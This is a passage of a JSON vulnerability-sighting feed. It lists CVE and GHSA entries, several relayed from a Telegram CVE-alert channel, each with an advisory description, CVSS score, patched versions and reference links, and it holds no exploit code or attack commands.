https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "2d59fbd9-c3c3-44a4-89fc-aa3a44b93842", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1468", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "3f97d409-8e6d-4b55-85e8-5c54a547d23a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4GRG-W6V8-C28G", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16163", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47278\n\ud83d\udd25 CVSS Score: 1.8 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: Flask is a web server gateway interface (WSGI) web application framework. In Flask 3.1.0, the way fallback key configuration was handled resulted in the last fallback key being used for signing, rather than the current signing key. Signing is provided by the `itsdangerous` library. A list of keys can be passed, and it expects the last (top) key in the list to be the most recent key, and uses that for signing. Flask was incorrectly constructing that list in reverse, passing the signing key first. Sites that have opted-in to use key rotation by setting `SECRET_KEY_FALLBACKS` care likely to unexpectedly be signing their sessions with stale keys, and their transition to fresher keys will be impeded. Sessions are still signed, so this would not cause any sort of data integrity loss. Version 3.1.1 contains a patch for the issue.\n\ud83d\udccf Published: 2025-05-13T15:57:40.409Z\n\ud83d\udccf Modified: 2025-05-13T15:57:40.409Z\n\ud83d\udd17 References:\n1. https://github.com/pallets/flask/security/advisories/GHSA-4grg-w6v8-c28g\n2. https://github.com/pallets/flask/commit/73d6504063bfa00666a92b07a28aaf906c532f09\n3. https://github.com/pallets/flask/releases/tag/3.1.1", "creation_timestamp": "2025-05-13T16:30:45.000000Z"}, {"uuid": "782c893c-197f-4e18-8b10-e88d1437d3cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RQ7R-P9CQ-5Q4F", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15912", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47817\n\ud83d\udd25 CVSS Score: 8.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: In BlueWave Checkmate through 2.0.2 before b387eba, a profile edit request can include a role parameter.\n\ud83d\udccf Published: 2025-05-10T00:00:00.000Z\n\ud83d\udccf Modified: 2025-05-10T21:57:43.993Z\n\ud83d\udd17 References:\n1. https://github.com/bluewave-labs/Checkmate/pull/2161\n2. https://github.com/bluewave-labs/Checkmate/security/advisories/GHSA-rq7r-p9cq-5q4f\n3. https://github.com/bluewave-labs/Checkmate/commit/b387ebaae96fc3a23b090a8baea7a9ebaa70f052", "creation_timestamp": "2025-05-10T22:27:00.000000Z"}, {"uuid": "c73ce6f8-367c-4d28-b404-678b1c2befcc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WJMP-WPHQ-JVQF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16202", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46572\n\ud83d\udd25 CVSS Score: 9.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: passport-wsfed-saml2 provides passport strategy for both WS-fed and SAML2 protocol. A vulnerability present starting in version 3.0.5 up to and including version 4.6.3 allows an attacker to impersonate any user during SAML authentication by crafting a SAMLResponse. This can be done by using a valid SAML object that was signed by the configured IdP. Users are affected specifically when the service provider is using passport-wsfed-saml2 and a valid SAML document signed by the Identity Provider can be obtained. Version 4.6.4 contains a fix for the vulnerability.\n\ud83d\udccf Published: 2025-05-06T20:18:26.379Z\n\ud83d\udccf Modified: 2025-05-13T19:17:06.822Z\n\ud83d\udd17 References:\n1. https://github.com/auth0/passport-wsfed-saml2/security/advisories/GHSA-wjmp-wphq-jvqf\n2. https://github.com/auth0/passport-wsfed-saml2/commit/e5cf3cc2a53748207f7a81bfba9195c8efa94181", "creation_timestamp": "2025-05-13T19:30:57.000000Z"}, {"uuid": "d74fe7ae-1497-495f-8f1e-9d4936caf161", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GQ63-JM3H-374P", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16875", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26621\n\ud83d\udd25 CVSS Score: 7.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:H)\n\ud83d\udd39 Description: OpenCTI is an open source platform for managing cyber threat intelligence knowledge and observables. Prior to version 6.5.2, any user with the capability manage customizations can edit webhook that will execute javascript code. This can be abused to cause a denial of service attack by prototype pollution, making the node js server running the OpenCTI frontend become unavailable. Version 6.5.2 fixes the issue.\n\ud83d\udccf Published: 2025-05-19T16:01:50.419Z\n\ud83d\udccf Modified: 2025-05-19T16:01:50.419Z\n\ud83d\udd17 References:\n1. https://github.com/OpenCTI-Platform/opencti/security/advisories/GHSA-gq63-jm3h-374p\n2. https://github.com/OpenCTI-Platform/opencti/security/advisories/GHSA-mf88-g2wq-p7qm", "creation_timestamp": "2025-05-19T16:39:06.000000Z"}, {"uuid": "31c74714-7e9d-4142-93d9-5a29ddbf9f5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HXW5-9CC5-CMW5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16929", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47931\n\ud83d\udd25 CVSS Score: 2.1 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P)\n\ud83d\udd39 Description: LibreNMS is PHP/MySQL/SNMP based network monitoring software. LibreNMS v25.4.0 and prior suffers from a Stored Cross-Site Scripting (XSS) Vulnerability in the `group name` parameter of the `http://localhost/poller/groups` form. This vulnerability allows attackers to inject malicious scripts into web pages viewed by other users. LibreNMS v25.5.0 contains a patch for the issue.\n\ud83d\udccf Published: 2025-05-17T15:51:17.277Z\n\ud83d\udccf Modified: 2025-05-19T20:17:46.155Z\n\ud83d\udd17 References:\n1. https://github.com/librenms/librenms/security/advisories/GHSA-hxw5-9cc5-cmw5\n2. https://github.com/librenms/librenms/pull/17603\n3. https://github.com/librenms/librenms/commit/88fe1a7abdb500d9a2d4c45f9872df54c9ff8062\n4. https://github.com/librenms/librenms/blob/25.4.0/includes/html/pages/addhost.inc.php#L284", "creation_timestamp": "2025-05-19T20:39:26.000000Z"}, {"uuid": "7b6df33e-b8cc-4ce8-aa17-d03caac1b5b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9HJG-9R4M-MVJ7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17750", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-47081\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: Requests is a HTTP library. Due to a URL parsing issue, Requests releases prior to 2.32.4 may leak .netrc credentials to third parties for specific maliciously-crafted URLs. Users should upgrade to version 2.32.4 to receive a fix. For older versions of Requests, use of the .netrc file can be disabled with `trust_env=False` on one's Requests Session.\n\ud83d\udccf Published: 2025-06-09T17:57:47.731Z\n\ud83d\udccf Modified: 2025-06-09T18:40:40.996Z\n\ud83d\udd17 References:\n1. https://github.com/psf/requests/security/advisories/GHSA-9hjg-9r4m-mvj7\n2. https://github.com/psf/requests/pull/6965\n3. https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef\n4. https://requests.readthedocs.io/en/latest/api/#requests.Session.trust_env\n5. https://seclists.org/fulldisclosure/2025/Jun/2", "creation_timestamp": "2025-06-09T19:48:12.000000Z"}, {"uuid": "7ae78b42-8446-419e-8a26-52327b81a967", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2F4R-34M4-3W8Q", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16574", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47275\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: Auth0-PHP provides the PHP SDK for Auth0 Authentication and Management APIs. Starting in version 8.0.0-BETA1 and prior to version 8.14.0, session cookies of applications using the Auth0-PHP SDK configured with CookieStore have authentication tags that can be brute forced, which may result in unauthorized access. Certain pre-conditions are required to be vulnerable to this issue: Applications using the Auth0-PHP SDK, or the Auth0/symfony, Auth0/laravel-auth0, and Auth0/wordpress SDKs that rely on the Auth0-PHP SDK; and session storage configured with CookieStore. Upgrade Auth0/Auth0-PHP to v8.14.0 to receive a patch. As an additional precautionary measure, rotating cookie encryption keys is recommended. Note that once updated, any previous session cookies will be rejected.\n\ud83d\udccf Published: 2025-05-15T21:13:01.150Z\n\ud83d\udccf Modified: 2025-05-15T21:14:59.460Z\n\ud83d\udd17 References:\n1. https://github.com/auth0/auth0-PHP/security/advisories/GHSA-g98g-r7gf-2r25\n2. https://github.com/auth0/laravel-auth0/security/advisories/GHSA-9fwj-9mjf-rhj3\n3. https://github.com/auth0/symfony/security/advisories/GHSA-9wg9-93h9-j8ch\n4. https://github.com/auth0/wordpress/security/advisories/GHSA-2f4r-34m4-3w8q\n5. https://github.com/auth0/auth0-PHP/commit/52a79480fdb246f59dbc089b81a784ae049bd389\n6. https://github.com/auth0/auth0-PHP/releases/tag/8.14.0", "creation_timestamp": "2025-05-15T21:33:29.000000Z"}, {"uuid": "c6c138f9-4a65-430c-8df7-2ab0304f4479", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G98G-R7GF-2R25", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16574", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47275\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: Auth0-PHP provides the PHP SDK for Auth0 Authentication and Management APIs. Starting in version 8.0.0-BETA1 and prior to version 8.14.0, session cookies of applications using the Auth0-PHP SDK configured with CookieStore have authentication tags that can be brute forced, which may result in unauthorized access. Certain pre-conditions are required to be vulnerable to this issue: Applications using the Auth0-PHP SDK, or the Auth0/symfony, Auth0/laravel-auth0, and Auth0/wordpress SDKs that rely on the Auth0-PHP SDK; and session storage configured with CookieStore. Upgrade Auth0/Auth0-PHP to v8.14.0 to receive a patch. As an additional precautionary measure, rotating cookie encryption keys is recommended. Note that once updated, any previous session cookies will be rejected.\n\ud83d\udccf Published: 2025-05-15T21:13:01.150Z\n\ud83d\udccf Modified: 2025-05-15T21:14:59.460Z\n\ud83d\udd17 References:\n1. https://github.com/auth0/auth0-PHP/security/advisories/GHSA-g98g-r7gf-2r25\n2. https://github.com/auth0/laravel-auth0/security/advisories/GHSA-9fwj-9mjf-rhj3\n3. https://github.com/auth0/symfony/security/advisories/GHSA-9wg9-93h9-j8ch\n4. https://github.com/auth0/wordpress/security/advisories/GHSA-2f4r-34m4-3w8q\n5. https://github.com/auth0/auth0-PHP/commit/52a79480fdb246f59dbc089b81a784ae049bd389\n6. https://github.com/auth0/auth0-PHP/releases/tag/8.14.0", "creation_timestamp": "2025-05-15T21:33:29.000000Z"}, {"uuid": "ad050392-64c9-478c-a019-cf990d594ba5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RQ92-F6FV-3629", "type": "seen", "source": "Telegram/y1cMF7MSs4iKIz6Tjc1sXNbleG9GlRmZjivyp4DyaM6b6bo", "content": "", "creation_timestamp": "2026-04-24T01:17:38.000000Z"}, {"uuid": "db0e9846-48d5-4887-829d-2919de3e1f76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RQG7-XFQG-V7Q5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16585", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47930\n\ud83d\udd25 CVSS Score: 5.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: Zulip is an open-source team chat application. Starting in version 10.0 and prior to version 10.3, the \"Who can create public channels\" access control mechanism can be circumvented by creating a private or web-public channel, and then changing the channel privacy to public. A similar technique works for creating private channels without permission, though such a process requires either the API or modifying the HTML, as we do mark the \"private\" radio button as disabled in such cases. Version 10.3 contains a patch.\n\ud83d\udccf Published: 2025-05-15T23:17:29.829Z\n\ud83d\udccf Modified: 2025-05-15T23:17:29.829Z\n\ud83d\udd17 References:\n1. https://github.com/zulip/zulip/security/advisories/GHSA-rqg7-xfqg-v7q5\n2. https://github.com/zulip/zulip/commit/d2ff4bda4c3efa30fc3ab1f151255cfdbf370f78\n3. https://zulip.com/help/configure-who-can-create-channels\n4. https://zulip.readthedocs.io/en/latest/overview/changelog.html#zulip-server-10-3", "creation_timestamp": "2025-05-15T23:36:28.000000Z"}, {"uuid": "263c0b8e-96e2-4954-8518-ccf408c97283", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PRP4-2F49-FCGP", "type": "seen", "source": "Telegram/kIu__LSWSF-lSSH53f04z2OEjKv8ykvXtTNiYc_9dOAOt4c", "content": "", "creation_timestamp": "2026-04-24T05:18:58.000000Z"}, {"uuid": "2d3d4c5b-6d87-4598-9164-408a88ea8a07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PMF9-2RC3-VVXX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19742", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-53091\n\ud83d\udd25 CVSS Score: 10 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Time-Based Blind SQL Injection vulnerability was discovered in version 3.3.3 the almox parameter of the `/controle/getProdutosPorAlmox.php` endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration. Version 3.4.0 fixes the issue.\n\ud83d\udccf Published: 2025-06-27T15:08:34.306Z\n\ud83d\udccf Modified: 2025-06-27T15:46:13.293Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-pmf9-2rc3-vvxx", "creation_timestamp": "2025-06-27T15:53:20.000000Z"}, {"uuid": "e65fdd48-fcd3-46b6-adcc-10e66505dc48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6GQR-MX34-WH8R", "type": "published-proof-of-concept", "source": "Telegram/dFYuTuT6dl_yI0G9HJyYD_4PvIziWC5eOoZdg93OWAfIZB0", "content": "", "creation_timestamp": "2026-04-24T03:15:39.000000Z"}, {"uuid": "762ec104-c2ef-4ecd-92dd-2896534991ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-762C-2538-H844", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16628", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48175\n\ud83d\udd25 CVSS Score: 4.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:L)\n\ud83d\udd39 Description: In libavif before 1.3.0, avifImageRGBToYUV in reformat.c has integer overflows in multiplications involving rgbRowBytes, yRowBytes, uRowBytes, and vRowBytes.\n\ud83d\udccf Published: 2025-05-16T00:00:00.000Z\n\ud83d\udccf Modified: 2025-05-16T05:06:31.307Z\n\ud83d\udd17 References:\n1. https://github.com/AOMediaCodec/libavif/commit/64d956ed5a602f78cebf29da023280944ee92efd\n2. https://github.com/AOMediaCodec/libavif/pull/2769\n3. https://github.com/AOMediaCodec/libavif/security/advisories/GHSA-762c-2538-h844", "creation_timestamp": "2025-05-16T05:34:35.000000Z"}, {"uuid": "3105e80a-43a7-4a3b-809e-fb8baa539e53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C7VQ-M7F8-RX37", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16691", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47791\n\ud83d\udd25 CVSS Score: 4.3 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: Nextcloud Server is a self hosted personal cloud system. In Nextcloud Server prior to 28.0.13, 29.0.10, and 30.0.3 and Nextcloud Enterprise Server prior to 28.0.13, 29.0.10, and 30.0.3, a currently unused endpoint to verify a share recipient was not protected correctly, allowing to proxy requests to another server. The endpoint was removed in Nextcloud Server 28.0.13, 29.0.10, and 30.0.3 and Nextcloud Enterprise Server 28.0.13, 29.0.10, and 30.0.3. No known workarounds are available.\n\ud83d\udccf Published: 2025-05-16T14:09:27.322Z\n\ud83d\udccf Modified: 2025-05-16T14:09:27.322Z\n\ud83d\udd17 References:\n1. https://github.com/nextcloud/security-advisories/security/advisories/GHSA-c7vq-m7f8-rx37\n2. https://github.com/nextcloud/server/pull/49558", "creation_timestamp": "2025-05-16T14:39:43.000000Z"}, {"uuid": "fbe2b806-0fcc-4832-b5eb-3c2e64b1f546", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JMJ9-2C4Q-849J", "type": "published-proof-of-concept", "source": "Telegram/wieF1Cc87yTCfYHn4YFnWJ1bAgxO-EGJdmyMzATQMYWieSQ", "content": "", "creation_timestamp": "2026-04-24T05:18:33.000000Z"}, {"uuid": "1efe4b71-2733-4da7-b00e-c38852ce7690", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7M2H-GMVJ-CJX2", "type": "published-proof-of-concept", "source": "Telegram/wieF1Cc87yTCfYHn4YFnWJ1bAgxO-EGJdmyMzATQMYWieSQ", "content": "", "creation_timestamp": "2026-04-24T05:18:33.000000Z"}, {"uuid": "f015a4b1-3527-4caa-aef0-e32eab4ab264", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MMGM-P9X9-H33J", "type": "published-proof-of-concept", "source": "Telegram/wieF1Cc87yTCfYHn4YFnWJ1bAgxO-EGJdmyMzATQMYWieSQ", "content": "", "creation_timestamp": "2026-04-24T05:18:33.000000Z"}, {"uuid": "374b195c-dfeb-4463-aef0-65138d819de5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4V9X-CQC5-J645", "type": "published-proof-of-concept", "source": "Telegram/lvQKk-ZCMh3Q3qpeojegtiwsEvYSJJ9oeMubqB_3D8wrl-U", "content": "", "creation_timestamp": "2026-04-24T15:22:27.000000Z"}, {"uuid": "ac89d723-1c42-4a69-9bde-1e0a60bff24a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4276", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17098", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-4467\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the QEMU disk image utility (qemu-img) 'info' command. A specially crafted image file containing a `json:{}` value describing block devices in QMP could cause the qemu-img process on the host to consume large amounts of memory or CPU time, leading to denial of service or read/write to an existing external file.\n\ud83d\udccf Published: 2024-07-02T15:57:23.648Z\n\ud83d\udccf Modified: 2025-05-21T01:01:21.498Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4276\n2. https://access.redhat.com/errata/RHSA-2024:4277\n3. https://access.redhat.com/errata/RHSA-2024:4278\n4. https://access.redhat.com/errata/RHSA-2024:4372\n5. https://access.redhat.com/errata/RHSA-2024:4373\n6. https://access.redhat.com/errata/RHSA-2024:4374\n7. https://access.redhat.com/errata/RHSA-2024:4420\n8. https://access.redhat.com/errata/RHSA-2024:4724\n9. https://access.redhat.com/errata/RHSA-2024:4727\n10. https://access.redhat.com/security/cve/CVE-2024-4467\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2278875", "creation_timestamp": "2025-05-21T01:45:15.000000Z"}, {"uuid": "f786a65c-4def-4e03-bb27-c41b7e53ddbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4724", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17098", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-4467\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the QEMU disk image utility (qemu-img) 'info' command. A specially crafted image file containing a `json:{}` value describing block devices in QMP could cause the qemu-img process on the host to consume large amounts of memory or CPU time, leading to denial of service or read/write to an existing external file.\n\ud83d\udccf Published: 2024-07-02T15:57:23.648Z\n\ud83d\udccf Modified: 2025-05-21T01:01:21.498Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4276\n2. https://access.redhat.com/errata/RHSA-2024:4277\n3. https://access.redhat.com/errata/RHSA-2024:4278\n4. https://access.redhat.com/errata/RHSA-2024:4372\n5. https://access.redhat.com/errata/RHSA-2024:4373\n6. https://access.redhat.com/errata/RHSA-2024:4374\n7. https://access.redhat.com/errata/RHSA-2024:4420\n8. https://access.redhat.com/errata/RHSA-2024:4724\n9. https://access.redhat.com/errata/RHSA-2024:4727\n10. https://access.redhat.com/security/cve/CVE-2024-4467\n11. 